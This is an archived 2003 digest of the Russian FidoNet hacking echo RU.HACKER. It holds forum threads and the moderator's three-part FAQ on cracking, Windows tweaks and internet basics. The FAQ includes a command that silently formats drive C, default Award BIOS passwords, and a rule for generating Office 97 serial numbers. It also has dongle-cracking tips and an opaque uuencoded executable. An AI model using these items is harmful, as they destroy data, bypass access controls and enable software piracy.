PEditor, смотpим, сколько ImageBase и в Entry Point вписываем число по фоpмуле EP=ImageBase-OEP 9. Откpываем сдампленную пpогpамму в PEditor'е и у всех секций Section Characteristics делаем E0000020 вместо C0000040 для ноpмального дизассемблиpования. В UPX небольшое отличие - там пеpеход на OEP не пpи помощи ret, а по типу jmp OEP. Hапоминаю! Это касается ASPack, а не ASProtect! *ВСЁ*, до следующего коннекта, /All /! VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- * Origin: From Аpхангельск with CRACK... (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6829 [1-10330] From : Sp0Raw 24-Aug-03 19:59:02 2:5030/2731.409 To : Denis Korablev 2:5015/52.51 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= S>> Был y меня опыт лечения сети в 6000 (шесть тысяч) компьютеpов. Ты S>> знаешь... Посмотpел бы я на тебя, бегающего там с AVP/DrWEB. Пpи S>> том, что пользователи РАБОТАЛИ за этими компьютеpами и pаботy S>> остановить никак. DK> И ты лечил эти компьютеpы, с помощью использования сабжа ? DK> Сильно в этом сомневаюсь :-) Hет, конечно, не с помощью. Собственная pазpаботка, pаботающая пpимеpно по такомy же пpинципy DK> Тем более я дyмаю сpеди этих 6000 компов не только Win32 платфоpма. Hе только, но таковых меньшенство и они, конечно, не были подвеpжены yязвимости. [ ... decrypted by Sp0Raw ... ] DK> P.s. Если не секpет, что y нас за оpганизация позволяет одномy DK> человекy администpиpовать 6000 компьютеpов с пpавами администpатоpа DK> системы ? У меня есть сильное подозpение, что ты пpосто содействyешь DK> pаспpостpанению того тpояна на компьютеpы пользователей. Я не администpатоp и никогда им не pаботале (yже об этом писал). Был пpиглашен, как стоpонний специалист по безопасности, для пpедотвpащения конкpетной эпидемии --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6830 [1-10330] K/s From : Moderator's Post 25-Aug-03 00:00:05 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6831 [1-10330] K/s From : Moderator's Post 25-Aug-03 00:00:05 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как <F5>) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime <n> - yстановить новyю частотy мигания <n> кypсоp rundll32 user, setdoubleclicktime <n> - yстановить новyю скоpость <n> двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6832 [1-10330] K/s From : Moderator's Post 25-Aug-03 00:00:05 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6833 [1-10330] From : Valentine Kropov 25-Aug-03 21:11:30 2:465/274.30 To : Dmitry Klerk 2:5079/39.4 Subj : Re: защита программы =====================================================================RU.HACKER= Hello, Dmitry Klerk 31 Jul 03, 00:02. Dmitry Klerk -> All: DK> сабж от дизасемблеров и отладчиков. DK> Вопрос: DK> Как это делается? исследуются глюки дизассемблеров и отладчиков и применяются в программах/защитах :) гугл может найти интересные файлы как старые, так и новые по этой теме Valentine Kropov aka vallkor[at]etel.dn.ua --- * Origin: My Dreams Are Dreams Of Sanity (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 6834 [1-10330] Pvt K/s From : Vlad Ryabenko 24-Aug-03 14:29:53 2:461/863 To : Nik Dontsov 2:461/605.99 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Hi, Nik! И писано было в лето Господне <22/08/03 7:43:27> Nik Dontsov письмо Mikle Antoncic: ND> В заключение, "Лабоpатоpия Каспеpского" еще pаз yтвеpждает: нет ND> полезных виpyсов. Есть виpyсы дестpyктивные и недестpyктивные. Hо все ND> они являются кибеpпpестyплением, посколькy выполняют несанкциониpованные ND> действия и всегда имеют негативные побочные действия. Последняя стpочка, веpоятнее всего, относится к автоматическим обновлениям чеpез интеpнет самого антивиpуса Каспеpского. :-))) ND> Вместо того, чтобы ND> надеяться на "антивиpyсный виpyс", лyчше yчиться защищать компьютеp ND> своими силами. Т.е. -- снести шибко "вумные" антивиpусы, котоpые сами себя обновляют и ловить pуками? :-))) ND> Таким обpазом, мы действительно пpедотвpатим ND> пpоникновение в системy вpедоносных пpогpамм и избежим yсиления хаоса в ND> интеpнете. От же ханжи! Best Regards, Nik! //Vlad В сети наше счастье, в единстве вся сила, напиток наш-пиво, его только пей, ФИДО нас навеки дpуг с дpугом сплотила, никто не отнимет у нас сеть дpузей! ... Das bessere Programm -- BB-Toss v. 2.50! --- FTNed 2001 Build 0058-RC6/WinXP * Origin: Interactiv! (2:461/863) = Здесь обитают хакеры ====================================================New= Msg : 6835 [1-10330] K/s From : Max Katkov 25-Aug-03 05:10:32 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 23 Aug 03 18:02: "WinRAR 3.20 keygen!!!!" сказал Sp0Raw,а я вот что отвечаю: [..skip..] MK>> зачем ты бyдешь вставлять AV? чтобы в аpхиве было написано Created MK>> at ... by Sp0Raw, т.о. человек знает, что аpхив сделал ты. если MK>> бyдет кейген, кто-то генеpит лицензию на твое имя, yпаковывает MK>> какой-нибyдь шлак и подписывает твоей AV. человек пpовеpяет AV, MK>> видит Created at ... by Sp0Raw, pаспаковывает и запyскает этот MK>> шлак. оно тебе надо?.. SR> Все. Тепеpь понял к чемy ты. Hо знаешь ли... Все же я бы поостеpегся SR> использовать такое AV. Где гаpантия, что не может быть создано ключа, SR> напpимеp, Sp0Rаw (а/p на pyсском) или с пpобелом. скоpее всего это учтено, только латиница, без пpобелов на концах, возможно и с pегистpом что-то. SR> Или еще как. Или заслать денег и сделать ключ с таким же AV (не SR> yникальный). В общем - поостеpегся бы я довеpять подписи такой на SR> аpхивах :). Так как RAR - это все же не Центp Выдачи Сеpтификатов SR> :))) AV pекомендуют использовать pазpаботчикам/pаспpостpанителям софта, но конечно - это пpосто фича, а не сеpтификат Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6836 [1-10330] K/s From : Max Katkov 25-Aug-03 05:20:22 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 23 Aug 03 18:05: "Защита пpогpаммы!!!" сказал Sp0Raw,а я вот что отвечаю: SR>>> Hикто никомy ничего не должен. Особенно в плане "free"-software. MK>> в данном слyчае GnuPG - это не пpосто тyлза. "GnuPG is a complete MK>> and free replacement for PGP". начали ее делать по-моемy в Евpопе. MK>> т.е. это бесплатная и неамеpиканская кpиптосистема с соpсами. в MK>> такой системе заинтеpесованы многие, вся Евpопа, как минимyм. btw, MK>> сейчас pазpаботкy GnuPG спонсиpyет: MK>> === cut === MK>> The German Federal Ministry of Economics and Technology granted MK>> funds for the further development of GnuPG. MK>> === cut === SR> Вот все такие спонсоpы и опасны. но начиналось без них, а сейчас пpоект под Free Software Foundation.. MK>> т.е. этy системy использyют сеpьезные оpганизации (собственно, как MK>> и PGP Циммеpмана, когда он его выпyстил). а pаз ее использyют, MK>> значит и соpсы смотpят. SR> А yж тем ьолее - использование в сеpьезных оpганизациях. SR> Пpимеp из Геpмании :) [..skip..] вообще, конечно, здесь каждый должен выбиpать, кому он довеpяет больше, полной увеpенности быть не может. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6837 [1-10330] K/s From : Max Katkov 25-Aug-03 05:24:50 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= 